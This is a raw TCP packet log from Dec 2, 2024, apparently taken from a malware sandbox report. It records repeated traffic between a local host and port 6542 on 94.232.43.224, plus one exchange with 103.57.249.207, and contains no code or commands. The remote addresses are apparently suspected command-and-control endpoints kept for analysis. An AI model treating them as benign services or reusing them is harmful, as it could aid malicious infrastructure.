                                                                  Dec 2, 2024 18:43:32.770761013 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.774876118 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.774928093 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.774955988 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.775022030 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.779357910 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.779422998 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.779423952 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.779459000 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.783473969 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.783534050 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.783622980 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.783673048 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.787844896 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.787915945 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.787945032 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.787970066 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.839929104 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.840029001 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.840045929 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.840094090 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.841675043 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.841751099 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.841821909 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.841871023 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.844635963 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.844696045 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.844819069 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.844870090 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.848090887 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.848164082 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.848202944 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.848247051 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.851620913 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.851675987 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.851733923 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.851788998 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.855271101 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.855325937 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.855441093 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.855484962 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.858747959 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.858800888 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.858864069 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.858907938 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.862298965 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.862359047 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.862418890 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.862462997 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.865973949 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.866028070 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.866069078 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.866112947 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.869585037 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.869652033 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.869709969 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.869759083 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.873037100 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.873094082 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.873373985 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.873545885 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.876280069 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.876349926 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.876483917 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.876528025 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.879251957 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.879302025 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.879390955 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.879441023 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.882447004 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.882492065 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.882561922 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.882613897 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.885565042 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.885616064 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.885762930 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.885812044 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.888715029 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.888786077 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.888823032 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.888873100 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.891947031 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.891999006 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.892002106 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.892040968 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.895227909 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.895287037 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.895370960 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.895510912 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.897226095 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.897279024 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.897371054 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.897424936 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.899785995 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.899842024 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.899986029 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.900036097 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.901990891 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.902045012 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.902084112 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.902132988 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.903736115 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.903794050 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.903871059 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.903922081 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.906816959 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.906871080 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.906938076 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.906991959 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.908235073 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.908288002 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.908334017 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.908382893 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.909998894 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.910058022 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.910396099 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.910453081 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.911746025 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.911794901 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.911879063 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.911930084 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.914132118 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.914200068 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.914241076 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.914289951 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.916114092 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.916173935 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.916228056 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.916270971 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.918168068 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.918225050 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.918272018 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.918319941 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.919976950 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.920032978 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.920064926 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.920114040 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.922061920 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.922113895 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.922194958 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.922244072 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.924000025 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.924066067 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.924139023 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.924190998 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.926722050 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.926780939 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.926889896 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.926934958 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.928771019 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.928796053 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.928822041 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.928834915 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.939673901 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.939795017 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.939857960 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.939857960 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.940450907 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.940499067 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.940558910 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.940603971 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.942497969 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.942548037 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.942686081 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.942728043 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.944240093 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.944291115 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.944340944 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.944385052 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:34.087785959 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:34.088016033 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:34.459047079 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:34.581716061 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:34.581798077 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:34.582204103 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:34.702397108 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:35.868282080 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:35.868432999 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:35.868446112 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:35.868449926 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:35.868509054 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:35.868509054 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:35.880697012 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:36.013264894 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:36.292853117 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:36.293075085 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:36.293603897 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:36.414376974 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.276055098 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.276238918 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.276252031 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.276346922 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.276819944 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.279752970 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.396251917 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.396270037 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.396354914 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.396434069 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.396447897 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.396493912 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.397068977 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.397082090 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.397124052 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.397825003 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.397835970 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.397845030 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.397869110 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.397891998 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.398448944 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.398461103 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.398503065 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.473855972 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.473962069 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.474034071 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.477144957 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.477193117 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.478425026 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.478535891 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.478585005 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.483407021 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.483510971 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.483580112 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.483633041 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.517144918 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.517432928 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.517487049 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.521450043 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.521573067 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.521617889 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.530163050 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.530221939 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.530268908 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.530313015 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.538665056 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.538711071 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.538759947 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.538799047 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.545413017 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.545465946 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.545656919 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.545703888 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.552540064 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.552613020 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.552695990 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.552741051 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.559745073 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.559829950 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.559946060 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.559993982 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.566900969 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.566961050 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.567044020 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.567089081 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.574156046 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.574215889 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.574302912 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.574351072 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.594310045 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.594484091 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.594511986 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.594540119 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.598691940 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.598751068 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.598805904 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.598855972 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.606302977 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.606385946 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.673995972 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.674036026 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.674107075 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.676949978 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.677015066 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.678071022 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.678129911 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.678255081 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.678302050 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.684226036 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.684302092 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.684377909 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.684422016 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.690458059 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.690618038 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.690685034 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.696191072 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.696361065 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.696424961 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.701931000 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.702230930 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.702287912 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.707619905 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.707745075 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.707817078 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.713362932 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.713506937 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.713576078 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.719197989 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.719213963 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.719285011 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.725141048 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.725202084 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.725250959 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.725296974 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.731590033 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.731690884 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.731753111 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.734915018 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.734978914 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.735074997 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.735124111 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.738564968 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.738622904 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.738718987 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.738787889 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.741784096 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.741852999 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.741863012 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.741902113 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.745222092 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.745273113 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.745371103 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.745418072 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.748991966 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.749046087 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.749192953 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.749245882 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.752577066 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.752665997 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.752720118 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.756172895 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.756237984 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.756385088 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.756434917 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.760081053 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.760158062 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:41.760402918 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:41.760459900 CET497616542192.168.2.594.232.43.224
